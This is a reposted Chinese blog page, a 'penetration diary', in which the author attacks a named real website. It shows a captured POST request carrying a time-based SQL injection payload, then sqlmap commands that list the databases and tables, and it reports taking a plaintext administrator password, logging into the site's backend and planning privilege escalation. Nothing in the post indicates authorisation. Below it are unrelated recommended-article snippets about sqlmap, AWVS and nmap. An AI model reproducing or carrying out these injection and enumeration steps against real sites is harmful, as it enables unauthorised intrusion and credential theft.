渗透日记-POST注入

最新推荐文章于 2023-11-09 10:56:32 发布
最新推荐文章于 2023-11-09 10:56:32 发布
阅读量251 收藏
点赞数 1
文章标签: php
原文链接:http://www.cnblogs.com/ximotao/p/5789464.html
版权

  今晚给一个网站做了一次入侵检测,首先进行信息刺探后,发现这个站有注入策略,所有页面都没法通过常规的注入,利用wvs扫描网站发现一个页面。

这个页面直接暴露出了错误信息,看了一下url没有参数却爆出了错误,感觉post能注入,于是抓包修改header分析了一下

Request
POST /medresult.php HTTP/1.1
Content-Length: 28
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=2ah1ottpdkcj0jgip9lgl54891
Host: www.zgyijing.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Acunetix-Product: WVS/8.0 (Acunetix Web Vulnerability Scanner - NORMAL)
Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED
Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm
Accept: */*

lm=5 and sleep(2)

发现这个页面存在SQL注入漏洞,还是POST类型的注入漏洞,防了GET注入但是没有防御POST注入,于是乎。。。跑一下sqlmap

格式为:sqlmap -u http://www.xxxxx.com  --data "lm=1"

发现确实是存在注入的,于是乎。。。 把表爆出来找关键的表

格式:sqlmap -u http://www.xxxxx.com --data "lm=1" --dbs

  发现一个关键信息的表,这个站用的库就是 vps051,于是乎把vps051这个哭的表爆出来

格式:sqlmap -u http://www.xxxxx.com --data "lm=1" -D vps051 --tables

  英语好点的同学应该猜测到管理员的表应该是master,爆出管理的表

  密码竟然是明文的,省去了破解的功夫,这下得到了管理的密码,登录网站后台

  接下来就可以考虑提权了。。

转载于:https://www.cnblogs.com/ximotao/p/5789464.html

lceBear
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
wvsc 解决awvs无法正常扫描问题
07-08
解决awvs无法正常扫描问题
rollup-plugin-postcss:PostCSS汇总插件
04-18
PostCSS汇总插件 它能做什么 使用PostCSS插件转换导入CSS文件 连接并提取处理后的样式 特征 源图支持 仅在配置请求时生成并保存源映射 生成可追溯到原始导入文件的正确源映射文件 使源相对于cwd 安装 npm install @...
web安全扫描问题(常见的)分析以及解决方式
chuange6363的博客
08-14 1376
这是我上午扫描的一个网站 很多地方地方不懂 在网上查了 严重问题有Session fixtion,vulnerable javascript library.. 1.什么是sessionfixation攻击Session fixation有人翻译成“Session完成攻击”,实际...
SQL注入原理-POST注入
T1ngSh0w的博客
09-17 4899
SQL注入原理-POST注入
利用sqlmap进行POST注入
热门推荐
lwpoor123的博客
12-24 12万+
利用sqlmap进行POST注入,常见的有三种方法: 注入方式一: 1.用Burp抓包,然后保存抓取到的内容。例如:保存为post.txt,然后把它放至某个目录下 2.列数据库: sqlmap.py -r "c:\Users\fendo\Desktop\post.txt" -p n --dbs 注:-r表示加载一个文件,-p指定参数 其中出现了三次提示: it looks l...
WEB渗透测试之三大漏扫神器
weixin_51725318的博客
11-09 390
WEB渗透测试之三大漏扫神器
ANSYS CFD-Post Users Guide.pdf
11-05
ANSYS CFD-Post用户指南简介 ANSYS CFD-Post是一款功能强大且功能齐全的计算流体动力学(CFD)后处理软件,由ANSYS公司开发。该软件旨在帮助用户快速、可靠地分析和可视化复杂的流体动力学仿真结果,提高科学研究和...
ANSYS CFD-Post Tutorials.pdf
07-25
ANSYS CFD-Post官方例子讲义,详细讲解了ANSYS CFD后处理的操作步骤和方法,是学习CFD-Post的必备资料。
CFD-POST导出数据方法.pdf
08-25
从CFD-Post导出数据的方法,包括导出一个点的数据和导出点云的数据,因为有时候在模拟的过程中,需要一个平面的速度、压力、温度分布情况,可以在平面上按照某个规律取n个点,得到各点的数值。
powermill 后处理教程+pm-post软件.zip
11-21
我在csdn里找了半天,发现了powermill 后处理的两个教程挺不错:一个是东北大哥手动改得教程影像,一个是word图文教程。我又补充了个pm-post软件(csdn里没找到,别处找的)。就要5币,不过分吧!
awvs安装文件.zip
01-14
kali安装awvs文件
Acunetix WVS漏洞扫描
05-07
学习Acunetix WVS扫描工具的安装,针对特定扫描目的,掌握Acunetix WVS扫描器的基本用法
渗透测试基础-POST注入
weixin_45488495的博客
04-08 2106
渗透测试基础-POST注入POST注入是什么POST注入靶场演练漏洞总结 只为对所学知识做一个简单的梳理,如果有表达存在问题的地方,麻烦帮忙指认出来。我们一起为了遇见更好的自己而努力????! POST注入是什么 post是一种传参方式,大多出现在各种框处,比如登录框,查询框,和各种与数据库有交互的框。 注入攻击是:用户输入的数据当作代码执行,这里有两个关键点 关键点一:用户能够控制输入 关键点二:原本程序要执行的代码,拼接了用户输入的数据 post注入与get注入没有本质的区别,无非就是一个在表单框执
AWVS14.4.21安装时出现Internet server exception和扫描失败(完美解决❤️)
LiBai'S BLOG
09-19 8355
“有想念,才是团圆,聚在一起,就是中秋”????问题描述????解决方法 ????问题描述 1、激活失败 在安装最新版的Acunetix Premium v14.4.210826124时,安装成功无法激活。 2、扫描失败 激活成功,添加目标网址进行扫描时出现扫描失败。 3、Internet server exception 激活成功,添加目标网址进行扫描时出现Internet server exception。 ????解决方法 对于上述三个出现的问题统一的原因是激活姿势不正确。 正确姿势 这是激活补丁
利用sqlmap进行post注入学习笔记
weixin_52034407的博客
03-19 2942
使用sqlmap进行post注入学习笔记
nmap扫描常用命令详解
鹿鸣天涯
09-12 2万+
常用命令:-vv是详细信息 nmap -vv -sT -sV -Pn 192.168.200.14 -p 1433 nmap -sT -sV -Pn 192.168.200.14 -p 1433 -sT TCP connect()扫描,这种方式会在目标主机的日志中记录大批连接请求和错误信息。 -sS 半开扫描,很少有系统能把它记入系统日志。不过,需要Root权限。 -sF -sN 秘密FIN数据包扫描、Xmas Tree、Null扫描模式 -s...
漏洞扫描工具AWVS介绍及安装教程
m0_61506558的博客
08-19 1万+
AWVS(Acunetix Web Vulnerability Scanner)是一款知名的网络漏洞扫描工具,通过网络爬虫测试网站安全,检测流行的Web应用攻击,如跨站脚本、sql 注入等。据统计,75% 的互联网攻击目标是基于Web的应用程序。
渗透学习日记day1
qq_44836237的博客
11-06 501
之前一直没有记录学习过程的习惯,后来发现很多知识会有遗忘,但是其实要记录的知识点多且杂乱,本日记主要记录自己的学习路线,注重的是对自己一个学习体系的规划建立的帮助。 在之前的渗透学习中,安装了kali和owaspbwa的靶场 kalilinux网络配置主要通过NAT或桥接: NAT相当是通过VM里的虚拟交换机再地址转换后与外网通信,虚拟机可以单向向外网通信 桥接模式下虚拟机IP和本地IP相同,外网可以直接与虚拟机通信 补充:kali可以通过systemctl status <服务名&
分别使用dirsearch工具,扫描网站的后台地址,操作步骤配截图,并对扫描结果加以分析。
x_13579的博客
02-03 2333
dirsearch是一个基于python的命令行工具,用于暴力扫描页面结构,包括网页中的目录和文件。多线程、7可保持连接、支持多种后缀、生成报告、递归的暴力扫描、支持HTTP代理、批量处理。
CFD-post注册表失效
最新发布
12-04
CFD-post是ANSYS Fluent的后处理工具,如果注册表失效,可能会导致无法正常使用该工具。以下是解决CFD-post注册表失效的步骤: 1. 打开Windows注册表编辑器,方法是按下Win+R键,输入regedit,然后按下回车键。 2. 导航到以下路径:HKEY_CURRENT_USER\Software\ANSYS Inc.\CFD-Post\2021R1\CFD-Post\Preferences 3. 在右侧窗格中找到License Server项,双击它并将其值更改为正确的许可证服务器地址。 4. 如果License Server项不存在,请右键单击Preferences文件夹,选择新建>字符串值,将其命名为License Server,然后将其值设置为正确的许可证服务器地址。 5. 关闭注册表编辑器并重新启动CFD-post。 如果以上步骤无法解决问题,请确保您的许可证文件仍然有效,并且您的许可证服务器正在运行。如果问题仍然存在,请联系ANSYS技术支持。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值